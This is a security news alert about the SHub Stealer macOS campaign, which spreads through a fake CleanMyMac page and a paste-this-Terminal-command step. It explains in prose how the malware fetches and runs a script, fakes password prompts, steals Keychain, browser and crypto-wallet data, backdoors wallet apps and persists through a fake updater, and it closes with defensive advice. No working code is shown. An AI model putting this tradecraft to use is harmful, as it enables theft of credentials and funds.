Cybersecurity Alert: Mac Users Targeted by Sophisticated SHub Stealer Campaign
In a troubling development for macOS users, hackers have launched a campaign exploiting a counterfeit CleanMyMac download page to distribute a malicious software known as SHub Stealer. This nefarious infostealer is particularly effective at draining cryptocurrency wallets and compromising sensitive personal data.
Instead of providing a familiar installer, the counterfeit webpage introduces an unconventional “advanced” installation step that instructs users to "Open Terminal and paste the following command." This technique, referred to as the ClickFix method, is becoming increasingly prevalent in recent Mac malware campaigns. It is designed to trick users into executing commands that could bypass typical security measures.
When the user executes this command, the initially reassuring output displays a connection to the authentic CleanMyMac URL, creating a misleading sense of legitimacy. Subsequently, the command decodes a hidden base64 link and downloads a shell script directly from the hacker’s server. This shell script is piped immediately into the zsh shell for execution without showing any visible prompts or Gatekeeper alerts, effectively circumventing core macOS security protections such as notarization checks and XProtect.
The loader script first evaluates the system’s security by checking for a Russian-language keyboard. If such a keyboard is detected, the script exits, which aligns with a well-established pattern in Russian-speaking cybercriminal circles to geo-fence their attacks.
This malicious campaign operates through a spoofed website, cleanmymacos[.]org, designed to mimic the legitimate CleanMyMac product page. However, it notably lacks any legitimate connections to MacPaw, the company behind the genuine CleanMyMac application. Once the user pastes the malicious command and hits Return, traditional protections like Gatekeeper, notarization checks, and XProtect become ineffective.
Upon approval, the loader script retrieves an AppleScript payload from the malicious server. This payload closes the Terminal window while generating a fake “System Preferences” password prompt that employs Apple’s recognizable padlock icon. The text in this dialog reads awkwardly: “Required Application Helper. Please enter password for continue.” This is a subtle hint of the deception at play; however, the script will aggressively prompt the user up to ten times, validating each input against the actual user account until the correct password is obtained.
With access to the legitimate password, SHub Stealer proceeds to unlock the macOS Keychain and conduct a methodical search for valuable data. It targets 14 Chromium-based browsers, as well as Firefox, for saved passwords, cookies, and autofill information. Additionally, it scans for extensions related to 102 known cryptocurrency wallets and gathers local data from various desktop wallets, including popular options such as Exodus, Atomic Wallet, Ledger Live, and Trezor Suite. The malware not only collects data from iCloud and Safari but also mines sensitive information from Apple Notes, Telegram sessions, shell histories, and configuration files that may contain tokens.
This gathered data is then compressed into a ZIP file and sent to a designated endpoint using a hardcoded API key. Temporary files are subsequently removed, thus obscuring the theft from the user.
What sets SHub apart from typical infostealer malware is its installation of long-term backdoors in cryptocurrency wallets. If the malware identifies specific Electron-based wallets, it subtly replaces their application’s core files with tampered versions sourced from the command center. It then terminates the original processes, replaces them with its modified versions, and re-signs the applications to evade detection by macOS.
In particular, variants of Exodus and Atomic Wallet are designed to exfiltrate passwords and seed phrases every time the user unlocks their wallets. Meanwhile, backdoored versions of Ledger Wallet and Ledger Live disable TLS checks and showcase false recovery wizards to capture seed phrases. Trezor Suite iterations also display misleading critical update overlays that acquire sensitive phrases while disabling updates to maintain the persistence of the malicious build.
To sustain full control over the compromised system, SHub establishes a LaunchAgent that mimics Google’s legitimate updater, executing every 60 seconds. This enables an ongoing backdoor to the victim’s Mac and allows the execution of base64-encoded commands, all while presenting a false error message that suggests “CleanMyMac” failed to install.
Experts have observed that SHub is part of a swiftly growing family of AppleScript-based macOS infostealers, which also includes other malware like MacSync Stealer and Atomic Stealer. These threats utilize ClickFix-style command pasting, fraudulent system prompts, and recursive data harvesting methods, demonstrating a disturbing trend in macOS vulnerabilities.
Moreover, this campaign represents a broader tactic in cybercrime, where attackers leverage polished imitations of reputable software to lure victims through poisoned advertisements and search engine optimization strategies.
Ultimately, researchers advise users to exercise caution: legitimate Mac applications almost never require the pasting of shell commands from a web page. If a site requests such an action—especially one that mimics a trusted brand—it should be viewed as a significant warning sign. Users are urged to shut down the webpage and only download software from recognized suppliers or the official Mac App Store.